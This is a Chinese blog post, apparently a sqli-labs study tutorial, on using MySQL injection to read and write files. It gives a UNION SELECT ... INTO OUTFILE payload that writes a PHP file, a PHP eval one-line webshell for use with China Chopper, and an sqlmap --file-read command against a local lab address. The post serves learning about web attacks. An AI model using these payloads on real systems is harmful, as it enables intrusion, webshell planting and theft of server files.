当前位置:网站首页>SQL注入(4)
SQL注入(4)
2022-08-09 03:04:00 【CHIAJ176】
Mysql注入读写文件
Mysql注入读文件
mysql数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据外,还可以进行对文件进行读写(但前提是权限足够)
读取的前提:
1、用户权限足够高,尽量具有root权限
2、secure_file_priv不为NULL
secure_file_priv一般默认为NULL。
注意:打开mysql.ini文件要到mysql原始路径打开修改,否则没用
在mysql.ini文件中插入"secure_file_priv =","secure_file_priv ="语句不能放到上方。
load_file() #读文件函数
Mysql注入写文件
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
根据上图可知有3个字段
UNION SELECT 1,'<?php phpinfo();?>',3 into outfile'C:\\study\\1.php' --+
写入Webshell
写入一句话木马,
<?php @eval($_POST['x'];?)>
。使用中国菜刀连接
Sqlmap安全测试
利用Sqlmap -hh查看详细信息
sqlmap -u "http://192.168.81.128/sqli/Less-7/?id=1" --file-read "C:\\study\\falg.txt"
边栏推荐
猜你喜欢
二分搜索法和二叉搜索树
Financial Industry Software Testing Interview Questions (with Answers) | Getting Started Guide
新型双功能螯合剂NOTA及其衍生物CAS号:147597-66-8p-SCN-Bn-NOTA
深度学习:优化器
Chapter3 numpy创建数组
书签收藏难整理?这款书签工具管理超方便
掌握 TypeToken 原理及泛型擦除
原文翻译:Structure Aware Single-stage 3D Object Detection from Point Cloud
OpenLORIS-Object Datasets
[TensorRT] 对UNet进行推理加速
随机推荐
unshift() :将一个或多个元素添加到数组的开头
【图像去噪】基于边缘增强扩散 (cEED) 和 Coherence Enhancing Diffusion (cCED) 滤波器实现图像去噪附matlab代码
图论相关知识
C专家编程 第9章 再论数组 9.7 轻松一下---软件/硬件平衡
"Lonely Walking on the Moon": Two choices of Duguyue, let a "middleman" become a big hero
C专家编程 第9章 再论数组 9.4 数组片段的下标
powershell 执行策略
01| 数据类型
win10上运行emwin
Redis中SDS简单动态字符串
【洛谷】P1456 Monkey King
如何应对网络攻击?
Kubernetes:(十五)PV与PVC的《恩怨情仇》
ARM开发(二)ARM体系结构——ARM,数据和指令类型,处理器工作模式,寄存器,状态寄存器,流水线,指令集,汇编小练习题
Ingress的概念和原理
对线面试官实现去重和幂等
MySQL相关知识 和 数据的存储相关知识
redis集群详解
交换VLAN实验
Day021 图书管理系统(对象和数组)